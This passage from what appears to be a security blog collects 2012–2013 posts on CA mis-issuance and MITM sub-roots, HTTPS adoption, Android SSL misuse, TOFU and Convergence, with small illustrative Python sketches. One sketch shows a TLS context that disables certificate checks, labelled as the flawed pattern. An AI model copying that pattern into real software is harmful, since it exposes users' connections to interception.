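            if lender.offers(amount):
                # Requester walks to the lender, takes the bill, confirms.
                # Nothing here stops the requester walking off without
                # confirming, or the lender handing over a fake note.
                requester.balance -= amount + service_fee(amount)
                lender.balance += amount
                return lender
        return None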

    The good thing about being an FCer is that you can design that one over beers, and have a good belly laugh for the same price. I don't know how to put it gently, but hey guys, don't do that for real, ok?!

    All by way of saying, financial cryptography is where it's at!

    Posted by iang at 03:20 PM | Comments (1) | TrackBack

    March 05, 2013

    How to use PGP to verify that an email is authentic

Ironic, but xkcd nails it: at least one can draw the picture. What instructions would one draw for secure browsing these days?

    Posted by iang at 06:26 PM | Comments (1) | TrackBack

    January 05, 2013

    Yet another CA snafu

    In the closing days of 2012, another CA was caught out making mistakes:

2012.5 -- A CA here issued 2 intermediate roots to two separate customers, 8th August 2011 (Mozilla mail/Mert Özarar). The process that allowed this to happen was discovered later on and fixed, and one of the intermediates was revoked. On 6th December 2012, the remaining intermediate was placed into an MITM context and used to issue an unauthorised certificate for *.google.com (DarkReading). These certificates were detected by Google Chrome's pinning feature, a recent addition. "The unauthorized Google.com certificate was generated under the *.EGO.GOV.TR certificate authority and was being used to man-in-the-middle traffic on the *.EGO.GOV.TR network" (Wired). Actions: vendors revoked the intermediates (Microsoft, Google, Mozilla). Damages: Google will revoke Extended Validation status on the CA in January's distro, and Mozilla froze a new root of the CA that was pending inclusion.

    I collect these stories for a CA risk history, which can be useful in risk analysis.

Beyond that, what is there to say? It looks like this CA made a mistake that let some certs slip out. It caught one of them later, but not the other. The owner/holder of the cert at some point tried something different, including an MITM. One can see the coverup proceeding from there...

Mistakes happen. This so far is somewhat distinct from issuing root certs for the deliberate practice of MITMing. It is also distinct from the overall risk equation that says that because every CA can issue certs for your browser, only one compromise is needed, and all CAs are compromised. That is, the system is brittle.
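Pinning, the feature that caught this one, is conceptually simple. Chrome pins keys in the expected chain; a minimal sketch of the same idea pins the leaf certificate itself, with the fingerprint recorded out of band (the pin below is a placeholder, not a real value):

    import hashlib, ssl

    PINS = {"www.google.com":
            "0000000000000000000000000000000000000000000000000000000000000000"}

    def pin_ok(host, port=443):
        # Any CA can issue a cert the browser will accept; the pin check
        # accepts only the one certificate we recorded beforehand.
        pem = ssl.get_server_certificate((host, port))
        der = ssl.PEM_cert_to_DER_cert(pem)
        return hashlib.sha256(der).hexdigest() == PINS[host]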

But what is now clear is that the trend started in 2011 has been confirmed in 2012 -- we have 5+ incidents in each year. For many reasons, the CA business has reached a plateau of aggressive attention. It can now consider itself under attack, after 15 or so years of peace.

    Posted by iang at 04:14 PM | Comments (3) | TrackBack

    November 22, 2012

    Facebook goes HTTPS-always - victory after a long hard decade

    In news that might bemuse, Facebook is in the process of turning on SSL for all time. In this it is following google and others. In that, they, meaning google and Co., are following yet others including EFF, Mozilla and a bunch of others.

They, in turn, are following Tyler, Amir, Ahmad and yours truly.

We have been pushing for the use of all-authenticated web pages for around 8 years now. The reason is complicated and it is *nothing to do with wifi*, but it's ok to use that excuse if that is easier to explain. It is really all about phishing, which causes an MITM against a web-user (SSL or not). The reason is this: if we have SSL always on, then we can rely on a whole bunch of other protections to lock in the user: pinning and client certificates spring to mind, but also never forget that the CA was supposed to show the user she was on her own bank, not somewhere else.

But without SSL always on, solutions were complicated, impossible, or easily tricked. So a deep analysis concluded, back in the mid-2000s, that we had to move the net across to all-SSL: only SSL, for any site with user interactions. (Which since then has become all of them -- remember that surfing in a basic read-only mode was possible in those days...)

A project was born. Slowly, TLS/SNI was advanced. Browsers experimented with new/old SSL display ideas. All browsers upgraded to SSL v3 and then to TLS. Servers followed suit, s.l.o.w.l.y.... SSL v2 got turned off, painfully. Various projects sprang up to report on SSL weaknesses, although they don't report on the absence of SSL, the greatest weakness of them all... OK, small baby steps, let's not rush it. Indeed, the reason my long-suffering readers have to deal with this site in SSL is because of that project. We eat my dogfood.
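For the record, the SNI piece -- the one-protected-site-per-IP blocker -- is these days a single parameter on the client side. A minimal sketch:

    import socket, ssl

    ctx = ssl.create_default_context()
    with socket.create_connection(("financialcryptography.com", 443)) as raw:
        # server_hostname goes out in the TLS hello (SNI), letting one IP
        # serve many certificates for many sites.
        with ctx.wrap_socket(raw, server_hostname="financialcryptography.com") as tls:
            print(tls.version(), tls.getpeercert()["subject"])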

    And, finally, some leaders started doing more widespread SSL.

(For those old-timers who remember -- this is how it was supposed to be. SSL was supposed to be always on. But back in 1995, it was discovered to be too expensive, so the business folks split the website and broke the security model (again!). Now there is no such excuse, and google reports somewhere that there was no hit to its performance. 15 years later :) )

    This is good news - we have reached a major milestone. I'll leave you with this one thought.

    This response all started with phishing. Which started in 2001, and got really going by 2003. Now, if we call Facebook the midpoint of the response ("before FB, you were early, after, you're a laggard!"), we can conclude that the Internet's security lifecycle, or the OODA loop, is a decade long.

    This observation I especially leave there for those thinking about starting a little cyber war.

    Posted by iang at 10:29 AM | Comments (0) | TrackBack

    November 21, 2012

    Some One Thing you know, you have, you are

Reading the FinServices' tongue-in-cheek prediction that "we should all be using Biometrics," I was struck by an old security aphorism:

    Something you know, something you have, something you are.

    The idea being that each of these was an independent system, so that even if we had a weak system in each domain, we could construct a strong system by redundantly combining all three. It wasn't perfect - it was a classical strength-through-redundancy design - but you could be forgiven for thinking it was the holy grail, because it was repeated so often by security people.
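
    To see how the redundancy argument works numerically, here is a toy calculation - a minimal sketch, assuming invented per-factor break probabilities and, crucially, independence between the factors:

        # If an attacker must defeat all three *independent* factors, the
        # combined break probability is the product of the parts.
        p_know, p_have, p_are = 0.10, 0.05, 0.02   # assumed odds, per factor

        p_all = p_know * p_have * p_are            # 0.0001, i.e. 1 in 10,000
        print(f"weakest single factor: {p_know:.0%}, all three: {p_all:.2%}")

    The catch, as the rest of this post argues, is that once all three factors converge onto one device, the independence assumption - and with it the multiplication - quietly disappears.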

    Meanwhile, life has moved on. And it has moved on to the point where we now have a convergence of these things into one:

    the mobile phone

    The mobile (or cell, or handy, as it is variously known) is decidedly something you have - and we can imagine bluetooth protocols to authenticate in a wireless context. We have SMS, RFID and NFC for those who like acronyms.

    It is also something you know. The individual knows how to fire up and run the apps on her phone, more so than anyone else - smartphones these days have lots of personality for their users to revel in. It is just an application design question how best to show that this woman knows her own phone and others do not. Trivial solutions are left to the reader.

    Finally -- the phone is something you are. If you don't follow that, you've been in a cave for the last decade. Start your catchup by buying an iPhone and asking your 13 year old to install some apps. Watch that movie _The Social Network_. Install the facebook app, perhaps related to that movie.

    The mobile phone is something you know, have and are. It will become the one security Thing of the future. This one Thing has some good aspects, and some bad aspects too. For one, if you lose the One, you're screwed. Even with the obvious downsides, users will choose this one option, and as systems providers, we might as well bind with them over it.

    With further apologies to J.R.R. Tolkien,

    One Thing to rule them all,
    One Thing to find them,
    One Thing to bring them all
    and in the darkness bind them.
    Posted by iang at 11:29 AM | Comments (1) | TrackBack

    October 21, 2012

    Planet SSL: mostly harmless

    One of the essential requirements of any system is that it actually has to work for people, and work enough of the time to make a positive difference. Unfortunately, this effect is easily obscured in security systems, because attacks can be either rare or hidden. In such an environment, we find persistent emphasis on strong branding rather than on security proven out in the field.

    SSL has frequently been claimed to be the world's most successful and most complicated security system - mostly because everything in SSL is oriented to relying on certificates, which are their own market-leading complication. It has therefore been suggested (here and in many other places) that SSL's protection sits somewhere between mostly harmless and mildly annoying but useful. Here's more evidence along those lines:

    "Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security"

    ...The most common approach to protect data during communication on the Android platform is to use the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocols. To evaluate the state of SSL use in Android apps, we downloaded 13,500 popular free apps from Google’s Play Market and studied their properties with respect to the usage of SSL. In particular, we analyzed the apps’ vulnerabilities against Man-in-the-Middle (MITM) attacks due to the inadequate or incorrect use of SSL.

    Some headlines, paraphrased:

    • 8.0% of the apps examined by automated analysis contain SSL/TLS code that is potentially vulnerable to MITM attacks.
    • 41% of apps selected for manual audit exhibited various forms of SSL/TLS misuse that allowed us to successfully launch MITM attacks...
    • Half of users questioned were not able to correctly judge whether their browser session was protected by SSL/TLS or not.
    • 73.6% of apps could have used HTTPS instead of HTTP with minimal effort by adding a single character to the target URLs.
    • 17.28% accepted any hostname or any certificate! (see the sketch just after this list)
    • 56% of banks "protected" by one generic banking app were breached by MITM attack.
    • One browser accepts any certificates...
    • One anti-virus product relied on SSL and not its own signature system, and was therefore vulnerable to being tricked into deleting itself :P
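
    What "accepting any certificate" looks like in practice: below is a minimal Python analogue of the misuse the paper found in Android apps - the host name is a placeholder, and the point is only the contrast between the two contexts:

        import socket
        import ssl

        host = "example.com"   # placeholder target

        # The broken pattern the study found: all checks disabled, so any
        # MITM with a self-signed cert is accepted without complaint.
        # (Shown only for contrast; never use it.)
        broken = ssl._create_unverified_context()

        # The correct pattern: the default context verifies the chain
        # against the trusted roots *and* checks the hostname.
        good = ssl.create_default_context()

        with socket.create_connection((host, 443)) as sock:
            with good.wrap_socket(sock, server_hostname=host) as tls:
                print(tls.version(), tls.getpeercert()["subject"])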

    With numbers like these, we can pretty much conclude that SSL is unreliable in that domain - no real user can even come close to relying on its presence.

    The essential cause of this is that the secure browsing architecture is too complicated to work. It relies on too many "and that guy has to do all this" exceptions. Worse, the Internet browsing paradigm requires that the system work flawlessly or not at all, which conundrum this paper perhaps reveals as: flawlessly hidden and probably not working either.

    This is especially the case in mobile work, where fast time cycles and compact development contexts conspire to make security less of a leading requirement. Critics will complain that the app developers should fix their code, and that SSL works fine when it is properly deployed. Sure, that's true, but it consistently doesn't happen; the SSL architecture is at fault for its low rates of reliable deployment. If a security architecture cannot be reliably deployed in adverse circumstances such as mobile, why would you bother?

    So where do we rate SSL? Mostly harmless, a tax on the Internet world, or a barrier to a better system?

    Posted by iang at 04:18 AM | Comments (2) | TrackBack

    August 26, 2012

    Use another browser - Kaspersky follows suit

    You saw it here first :) Kaspersky has dipped into the payments market with a thing called Safe Money:

    A new offering found in Kaspersky Internet Security is Safe Money, Kaspersky Lab's unique technology designed to protect the user's money when shopping and banking online. To keep your cash safe, Kaspersky Internet Security's Safe Money will:
      1. Automatically activate when visiting most common payment services (PayPal, etc.), banking websites, and you can easily add your own bank or shopping websites to the list.
      2. *Isolate your payment operations in a special web browser to ensure your transactions aren't monitored*.
      3. Verify the authenticity of the banking or payment website itself, to ensure the site isn't compromised by malware, or a fake website designed to look authentic.
      4. Evaluate the security status of your computer, and warn about any existing threats that should be addressed prior to making payments.
      5. Provide an onscreen Virtual Keyboard when entering your credit card or payment information so you can enter your information with mouse-clicks. This will activate a special program to prevent malware from logging any keystrokes on your physical keyboard.
      ...

    The #2 tip is the same as tip #2 that's been on this website for years - use one browser for common stuff and another for your online payments. This simple trick builds a good solid firewall between your money and the crooks' hands. What's more, it's easy enough to teach grandma and grandson.

    (For those lost for clue, download Chrome and Firefox. I advise using Safari for banking, Firefox for routine stuff and Chrome for google stuff. Whatever you do, keep that banking browser closed and locked down, until it is time to bring it up, switch to privacy mode, and type in the URL by hand.)

    Aside from Kaspersky's thumbs-up for #2, what else can we divine? If Kaspersky, one of the more respected anti-virus providers, has decided to dip its toe into payments protection, this might be a signal that phishing and malware are not diminishing. Or, at least, that the perception has not diminished.

    Out there in user-land, people don't really trust browsers to do their security, and since GFC-1 they don't really trust banks either. (They've never, ever trusted CAs.) This doesn't mean they can voice, explain or argue their mistrust, but it does mean that they feel the need - it is this perception that Kaspersky hopes to sell into.

    Chances are, it's a good pick, if only because we're all going to die before any of these providers deals with their cognitive dissonance on trust. Good luck Kaspersky, and hopefully you won't succumb to it either.

    Posted by iang at 07:34 AM | Comments (7) | TrackBack

    June 20, 2012

    Banks will take responsibility for online fraud

    Several cases in USA are resolving in online theft via bank account hackery. Here's one:

    Village View Escrow Inc., which in March 2010 lost nearly $400,000 after its online bank account with Professional Business Bank was taken over by hackers, has reached a settlement with the bank for an undisclosed amount, says Michelle Marsico, Village View's owner and president.

    As a result of the settlement, Village View recovered more than the full amount of the funds that had been fraudulently taken from the account, plus interest, the company says in a statement.

    And two more:

    Two similar cases, PATCO Construction Inc. vs. Ocean Bank and Experi-Metal Inc. vs. Comerica Bank, raised questions about liability and reasonable security, yet each resulted in a different verdict.

    In 2010, PATCO sued Ocean Bank for the more than $500,000 it lost in May 2009, after its commercial bank account with Ocean Bank was taken over. PATCO argued that Ocean Bank was not complying with existing FFIEC requirements for multifactor authentication when it relied solely on log-in and password credentials to verify transactions.

    Last year, a District Court magistrate found the bank met legal requirements for multifactor authentication and dismissed the suit.

    In December 2009, EMI sued Comerica after more than $550,000 in fraudulent wire transfers left EMI's account.

    In the EMI ruling, the court found that Comerica should have identified and disallowed the fraudulent transactions, based on EMI's history, which had been limited to transactions with a select group of domestic entities. The court also noted that Comerica's knowledge of phishing attempts aimed at its clients should have caused the bank to be more cautious.

    In the ruling, the court required Comerica to reimburse EMI for the more than $560,000 it lost after the bank approved the fraudulent wire transfers.

    Here's how it happens. There will be many of these. Many of the victims will sue. Many of the cases will lose.

    Those that lose are irrelevant. Those that win will set the scene. Eventually some precedent will be found, either at law or at reputation, that will allow people to trust banks again. Some more commentary.

    The reason for the inevitability of this result is simple: society and banks both agree that we don't need banks unless the money is safe.

    Online banking isn't safe. It behoves the banks to make it safe. We're in the phase where the courts of law and of public opinion are working to get that result.

    Posted by iang at 04:42 PM | Comments (2) | TrackBack

    June 16, 2012

    The Equity Debate

    I don't normally copy directly from others, but the following post by Bruce Schneier provides an introduction to one of the most important topics in Information Security. I have tried long and hard to write about it, but the topic is messy, controversial and hard evidence is thin. Here goes...

    Bruce Schneier writes in Forbes about the booming vulnerabilities market:

    All of these agencies have long had to wrestle with the choice of whether to use newly discovered vulnerabilities to protect or to attack. Inside the NSA, this was traditionally known as the "equities issue," and the debate was between the COMSEC (communications security) side of the NSA and the SIGINT (signals intelligence) side. If they found a flaw in a popular cryptographic algorithm, they could either use that knowledge to fix the algorithm and make everyone's communications more secure, or they could exploit the flaw to eavesdrop on others -- while at the same time allowing even the people they wanted to protect to remain vulnerable. This debate raged through the decades inside the NSA. From what I've heard, by 2000, the COMSEC side had largely won, but things flipped completely around after 9/11.

    It's probably worth reading the rest of the article too - I only took the one para talking about the Equities Debate.

    What's it about? Well, in a nutshell, the intelligence community debated long and hard about whether to allow the world's infosec infrastructure to be vulnerable, so as to assist spying. Or not.... Is there such a stark choice? The answer to this is a bit difficult to prove, but I'm going to put my money on YES: for the NSA it is either/or. The reason for this is that when the NSA goes for vulnerabilities, there are all sorts of flow-on effects:

    Limiting research, either through government classification or legal threats from vendors, has a chilling effect. Why would professors or graduate students choose cryptography or computer security if they were going to be prevented from publishing their results? Once these sorts of research slow down, the increasing ignorance hurts us all.

    I remember this from my early formative years at university - security work was considered a bad direction to head in. As you got into it, you found all of these restrictions and regulations. It just had a bad taste; the brighter people were bright enough to go elsewhere.

    In general, it seems that for the times the NSA erred on the side of "YES! let them be weak," we are now counting the cost. If you look back through the last couple of decades, the mantra is very clear: security is an afterthought. That's in large part because almost nobody coming out of the training camps is steeped in it. We got away with this for a decade or two while the Internet was in its benign phase - the 1990s, mere spam, etc.

    But that's all changed now. The chickens are coming home to roost. For one example, if you look at the timeline of CA attacks over the last decade, there is a noticeable spike in 2011. For another, look at Stuxnet and Flame as cyberweapons of inspiration.

    Which brings costs to everyone.

    I personally think the Equity Issue within the NSA is perhaps the single most important information security influence, ever. Their mission is two-fold: to protect and to listen. By choosing vulnerability over protection, we have all suffered. We are now in the cost-amortisation phase; for the next decade we will suffer a non-benign Internet risk environment.

    Next time you read of the US government banging the cyberwar drum in order to rustle up budget for cyberwarriors, ask them if they've re-thought the equity issue, and why we would provide funds for a problem they created in the first place.

    Posted by iang at 06:50 AM | Comments (1) | TrackBack

    March 20, 2012

    More context on why context undermines threat modelling...

    Lynn was there at the beginning of SSL, and sees where I'm going with this. He writes in Comments:

    > I have a similar jaundiced view of a lot of the threat model stuff in the mid-late 90s ... Lots of parties had the solution (PKI) and they were using the facade of threat models to narrowly focus in portion of problem needing PKI as solution (they had the answer, now they needed to find the question). The industry was floating business plans on wall street $20B/annum for annual $100 digital certificates for individuals. We had been called in to help wordsmith the cal. state electronic signature legislation ... and the industry was heavily lobbying that the legislation mandate (annual, individual) digital certificates.


    Etc, etc. Yes, this is the thing that offends - there is a flaw in pure threat modelling, and that flaw was enough to drive an industry through. We're still paying the dead-weight costs, and will be for some time.

    The question is whether the flaw in threat modelling can be repaired by patches like "oh, you should consider the business" or whether we need to recognise that nobody ever does. Or can. Or gets paid to.

    In which case we need a change in metaphor. A new paradigm, as they say in the industry.

    I'm thinking the latter. Hence, Risk Analysis.

    Posted by iang at 10:41 AM | Comments (0) | TrackBack

    March 12, 2012

    Measuring the OODA loop of security thinking -- Can you say - firewalls & SSL?

    So, you want to know where the leading thinkers are in security today?

    Coviello called for the industry to rally together to take the following actions:
    -- Change how we think about security. The security industry must stop thinking linearly, "...blindly adding new controls on top of failed models. We need to recognize, once and for all, that perimeter-based defenses and signature-based technologies are past their freshness dates, and acknowledge that our networks will be penetrated. We should no longer be surprised by this," Coviello said.

    Can you say, firewalls & SSL? It's so long ago that this metaphor was published by Gunnar that I can't even remember. But here's his firewalls & SSL infosec debt clock, starting 1995.

    Posted by iang at 09:17 PM | Comments (3) | TrackBack

    February 28, 2012

    Serious about user security? Plonk down a million in prizes....

    Google offers $1 million reward to hackers who exploit Chrome
    By Dan Goodin | Published February 27, 2012 8:30 PM

    Google has pledged cash prizes totaling $1 million to people who successfully hack its Chrome browser at next week's CanSecWest security conference.

    Google will reward winning contestants with prizes of $60,000, $40,000, and $20,000 depending on the severity of the exploits they demonstrate on Windows 7 machines running the browser. Members of the company's security team announced the Pwnium contest on their blog on Monday. There is no splitting of winnings, and prizes will be awarded on a first-come-first-served basis until the $1 million threshold is reached.

    Now in its sixth year, the Pwn2Own contest at the same CanSecWest conference awards valuable prizes to those who remotely commandeer computers by exploiting vulnerabilities in fully patched browsers and other Internet software. At last year's competition, Internet Explorer and Safari were both toppled but no one even attempted an exploit against Chrome (despite Google offering an additional $20,000 beyond the $15,000 provided by contest organizer Tipping Point).

    Chrome is currently the only browser eligible for Pwn2Own never to be brought down. One reason repeatedly cited by contestants for its lack of attention is the difficulty of bypassing Google's security sandbox.

    "While we’re proud of Chrome’s leading track record in past competitions, the fact is that not receiving exploits means that it’s harder to learn and improve," wrote Chris Evans and Justin Schuh, members of the Google Chrome security team. "To maximize our chances of receiving exploits this year, we’ve upped the ante. We will directly sponsor up to $1 million worth of rewards."

    In the same blog post, the researchers said Google was withdrawing as a sponsor of the Pwn2Own contest after discovering rule changes allowing hackers to collect prizes without always revealing the full details of the vulnerabilities to browser makers.

    "Specifically, they do not have to reveal the sandbox escape component of their exploit," a Google spokeswoman wrote in an email to Ars. "Sandbox escapes are very dangerous bugs so it is not in the best interests of user safety to have these kept secret. The whitehat community needs to fix them and study them. Our ultimate goal here is to make the web safer."
    In a tweet, Aaron Portnoy, one of the Pwn2Own organizers, took issue with Google's characterization that the rules had changed and said that the contest has never required the disclosure of sandbox escapes.

    Ars will have full coverage of Pwn2Own, which commences on Wednesday, March 7.

    Posted by iang at 08:01 PM | Comments (0) | TrackBack

    February 18, 2012

    one week later - chewing on the last morsel of Trust in the PKI business

    After a week of fairly strong deliberations, Mozilla has sent out a message to all CAs to clarify that MITM activity is not acceptable.

    It would seem that Trustwave might slip through without losing its spot in the root lists of the major vendors. The reason for this is a combination of: up-front disclosure, a short timeframe within which the subCA was issued and used (at this stage, limited to 2011), and the principle of wiser heads prevailing.

    That's my assessment at least.

    My hope is that this has set the scene. The next discovery will be fatal for that CA. The only way forward for a CA that has, at any time in the past, issued an MITM-enabled subCA would be the following:

    + up-front disclosure to the public. By that I mean, not privately to Mozilla or other vendors. That won't be good enough. Nobody trusts the secret channels anymore.
    + in the event that this is still going on, a *fast* plan, agreed and committed to vendors, to withdraw completely any of these MITM sub-CAs or similar arrangements. By that I mean *with prejudice* to any customers - breaching contract if necessary.

    Any deviation means termination of the root. Guys, you got one free pass at this, and Trustwave used it up. The jaws of Trust are hungry for your response.

    That is what I'll be looking for at Mozilla. Unfortunately there is no forum for Google and others, so Mozilla still remains the bellwether for trust in CAs in general.

    That's not a compliment; it's more a description of how little trust there is. If there is a desire to create some, that's possibly where we'll see the signs.

    Posted by iang at 10:53 PM | Comments (1) | TrackBack

    The Convergence of PKI

    Last week's post on the jaws of Trust sparked a bit of interest, and in comments Chris asks what I think about Convergence. I listened to this talk by Moxie Marlinspike, and it is entertaining.

    The 'new idea' is not difficult. The idea of Convergence is for independent operators (like CAcert or FSFE or FSF) to run servers that cache certificates from sites. Then, when a user's browser comes across a new certificate, instead of accepting the fiat declaration from the CA, it gets a "second opinion" from one of these caching sites.

    Convergence is best seen as conceptually extending or varying the SSH or TOFU model that has already been tried in browsers through CertPatrol, Trustbar, Petnames and the like.

    In the Trust-on-first-use model, we can make a pretty good judgement call that the first time a user comes to a site, she is at low risk. It is only later on, as her relationship develops (think online banking), that her risk rises.

    This risk model works because the likelihood of an event is inversely aligned with the cost of mounting the attack. One single MITM might cost X, two might cost X+delta, and so on; as it goes on, it gets more costly. In two ways: firstly, maintaining the MITM over time against Alice pushes costs up far more dramatically than linear additions of a small delta. In this sense, MITMs are like DOSs: they are easier to mount for brief periods. Secondly, because we don't know of Alice's relationships beforehand, we have to cast a very broad net, so a lot of MITMs are needed to find the minnow that becomes the whale.

    First-use-caching or TOFU works then because it forces the attacker into an uneconomic position - the easy attacks are worthless.
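
    As a concrete illustration, here is the heart of a TOFU pin cache - a minimal sketch in Python, where the file name and fingerprint scheme are my own assumptions rather than any particular browser's:

        import hashlib
        import json
        import os

        PIN_FILE = "pins.json"   # hypothetical local cache of first-seen certs

        def check_tofu(host: str, der_cert: bytes) -> bool:
            """Pin the first certificate seen for a host; alarm if it changes."""
            pins = json.load(open(PIN_FILE)) if os.path.exists(PIN_FILE) else {}
            fingerprint = hashlib.sha256(der_cert).hexdigest()
            if host not in pins:               # first use: accept and remember
                pins[host] = fingerprint
                json.dump(pins, open(PIN_FILE, "w"))
                return True
            return pins[host] == fingerprint   # thereafter: must match the pin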

    Convergence then extends that model by using someone else's cache, thus further boxing the attacker in. With a fully developed Convergence network in place, we can see that the attacker has to conduct what amounts to a perfect MITM closer to the site than any caching server (at least at the threat-modelling level).

    Which in effect means he owns the site at least at the router level, and if that is true, then he's probably already inside and prefers more sophisticated breaches than mucking around with MITMs.
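
    Mechanically, the "second opinion" reduces to a quorum check across the caches - a minimal sketch, in which the notary caches and the quorum rule are illustrative assumptions, not the actual Convergence protocol:

        import hashlib

        def second_opinion(host: str, der_cert: bytes, notaries: list, quorum: int = 2) -> bool:
            """Accept a cert only if enough independent caches saw the same one."""
            fingerprint = hashlib.sha256(der_cert).hexdigest()
            # Each notary is modelled here as a dict of host -> fingerprint.
            agree = sum(1 for notary in notaries if notary.get(host) == fingerprint)
            return agree >= quorum   # the attacker must now fool the notaries too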

    Thus, the very model of a successful mitigation -- this is a great risk for users to accept if only they were given the chance! It's pretty much ideal on paper.

    Now move from paper threat modelling to *the business*. We can ask several questions. Is this better than the fiat or authority model of CAs which is in place now? Well, maybe. Assuming a fully developed network, Convergence is probably in the ballpark. A serious attacker can mount several false nodes, something that was seen in peer2peer networks. But a serious attacker can take over a CA, something we saw in 2011.

    Another question is: is it cheaper? Yes, definitely. It means that the entire middle ground of "white label" HTTPS certs, as Mozilla now shows them, can use Convergence and get approximately the same protection. No need to muck around with CAs. High-end merchants will still go for EV because of the branding effect sold to them by vendors.

    A final question is whether it will work in the economic sense - is this going to take off? Well, I wish Moxie luck, and I wish it well, but I have my reservations.

    Like so many other developments - and I wish I could take the time to lay out all the tall pioneers who provided the high view for each succeeding innovation - where they fall short is that they do not mesh well with the current economic structure of the market.

    In particular, one facet of the new market strikes me as overtaking events: the über-CA. In this concept, we re-model the world such that the vendors are the CAs, and the current crop are pushed down (or up) to become sub-CAs. E.g., imagine that Mozilla now creates a root cert and individually signs each root in its root list, thus turning it into a sub-root list. That's easy enough, although highly offensive to some.
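
    To make the über-CA concept concrete, here is a minimal sketch of that signing step using Python's cryptography package - the names, keys and lifetime are invented for illustration, and a real vendor would of course sign an existing root's actual key rather than a freshly generated stand-in:

        import datetime

        from cryptography import x509
        from cryptography.hazmat.primitives import hashes
        from cryptography.hazmat.primitives.asymmetric import rsa
        from cryptography.x509.oid import NameOID

        # Hypothetical vendor über-root, and a stand-in for an existing CA root.
        uber_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        uber_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Vendor Uber-Root")])
        old_ca_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        old_ca_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Legacy CA")])

        now = datetime.datetime.now(datetime.timezone.utc)
        sub_root = (
            x509.CertificateBuilder()
            .subject_name(old_ca_name)            # the old root becomes the subject...
            .issuer_name(uber_name)               # ...issued by the vendor's über-root
            .public_key(old_ca_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=365))
            .add_extension(x509.BasicConstraints(ca=True, path_length=0), critical=True)
            .sign(uber_key, hashes.SHA256())      # one signature demotes a root to a sub-root
        )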

    Without thinking of the other ramifications too much, now add Convergence to the über-CA model. If the über-CA has taken on the responsibility, and manages the process end to end, it can also do the Convergence thing in-house. That is, it can maintain its own set of servers, do the crawling, do the responding. Indeed, we already know how to do the crawling part; most vendors have had a go at it, just for in-house research.

    Why do I think this is relevant? One word - google. If the Convergence idea is good (and I do think it is) then google will have already looked at it, and will have already decided how to do it more efficiently. Google have already taken more steps towards the über-CA with their decision to rewire the certificate flow. Time for a bad haiku.

    Google sites are pinned now / All your 'vokes are b'long to us / Cache your certs too, soon.

    And who is the world's expert at rhyming data?

    Which all goes to say that Convergence may be a good idea, a great one even, but it is being overtaken by other developments. To put it pithily, the market is converging in another direction. 1-2 years ago, maybe yes, as google was still working on the browser at the standards level. Now google are changing the way things are done, and this idea will fall out easily in their development.

    (For what it is worth, google are just as likely to make their servers available for other browsers to use anyway, so they could just "run" the Convergence network. Who knows. The google talks to no-one, until it is done, and often not even then.)

    Posted by iang at 07:21 PM | Comments (2) | TrackBack

    February 09, 2012

    PKI and SSL - the jaws of trust snap shut

    As we all know, it's a rite of passage in the security industry to study the SSL business of certificates, and discover that all's not well in the state of Denmark. But the business of CAs and PKI rolled on regardless, seemingly because no threat ever challenged it. Because there was no risk, the system successfully dealt with the threats it had set itself. Which is itself elegant proof that academic critiques and demonstrations and phishing and so forth are not real attacks, and can be ignored entirely...

    Until 2011.

    Last year, we crossed the Rubicon for the SSL business -- and by extension certificates, secure browsing, CAs and the like -- with a series of real attacks against CAs. Examples include the DigiNotar affair, the Iranian affair (attacks on around 5 CAs), and also the lesser known attack a few months back where certificates may have been forged and may have been used in an APT and may have... a lot of things. Nobody's saying.

    Either way, the scene is set. The pattern has emerged, the Rubicon is crossed, and it gets worse from here on in. A clear and present danger, perhaps? In California, they'd be singing "let's party like it's 2003," the year that SB1386 slid past our resistance and set the scene for an industry debacle in 2005.

    But for us long term observers, no party. There will now be a steady series of these shocks, and journalists will write of our brave new world - security but no security.

    With one big difference. Unlike the SB1386 breach party, where we can rely on companies not going away (even as our data does), the security system of SSL and certificates is somewhat optional. Companies can and do expose their data in different ways. We can and do invent new systems to secure or mitigate the damage. So while SB1386 didn't threaten the industry so much as briskly kicked it around, this is different.

    At an attacks level, we've crossed a line, but at a wider systems level, we stand on the line.

    And that line is a cliff.

    Which brings us to this week's news. A CA called Trustwave has just admitted to selling a sub-root for the explicit purpose of MITM'ing. Read about that elsewhere.



    Now, we've known that MITMing for fun and profit was going on for a long time. Mozilla's community first learnt of it in the mid 2000s, as it was finalising its policy on CAs (a ground-breaking work that I was happy to be involved with). At that time, accusations were circulating against unnamed companies listing their roots for the explicit purpose of doing MITMs on unwitting victims. Which raised the hairs, eyebrows and hackles of not a few of us. These accusations have been repeated from time to time, but in each case the "insiders" begged off on the excuse: we cannot break NDA or reputation.

    Each time, the industry players were likewise able to fob it off. Hard evidence? None. Therefore, it doesn't exist, was the industry's response. We knew as individuals, yet as an industry we knew not.

    We are all agreed it does exist and it doesn't. We all have jobs to preserve, and will practice cognitive dissonance to the very end.

    Of course this situation couldn't last, because a secret of this magnitude never survives. In this case, the company that sold the MITM sub-root, Trustwave, has looked at 2011, and realised that the profit from that one sub-root isn't worth the risk of the DigiNotar experience (bankruptcy). Their decision is to 'fess up now, and take it on the chin, because later may be too late.

    Which leads to a dilemma, and we the players have divided on each side, one after the other, of that dilemma:

    To drop the Trustwave root, or not?



    That is the question. First the case for the defence: On the one hand, we applaud the honesty of a CA coming forward and cleaning up house. It's pretty clear that we need our CAs to do this. Otherwise we're not going to get anywhere with this Trust thing. We need to encourage the CAs to work within the system.

    Further, if we damage a CA, we damage its customers. The cost of lost business is traumatic, and the list of US government agencies that depend on this CA has suddenly become impressive. Just like DigiNotar, it seems, whose fall spread a wave of mistrust through the government IT departments of the Netherlands. Also, we have to keep an eye on (say) a bigger, more public-facing CA going down in the aftermath - and the damage to all its customers. And the next, etc.

    Is lost business more important than simple faith in those silly certificates? I think lost business is much more important - revenue, jobs, and money flowing to keep all of the different parts of the economy going are our most important assets. Ask any politician in the USA or Europe or China; this is their number one problem!

    Finally, it is pretty clear and accepted that the business purpose to which the sub-root was put was known and tolerated. Although it is uncomfortable to spy on one's employees, it is just business. Organisations own their data systems, have the responsibility to police them, and have advised their people that this is what they are going to do. SSL included, if necessary.

    This view has it that Trustwave has done the right thing. Therefore, pass. And the more positive proponents suggest an amnesty, after which period there is summary execution for the sin - root removal from the list distributed by the browsers. It's important not to cause disruption.



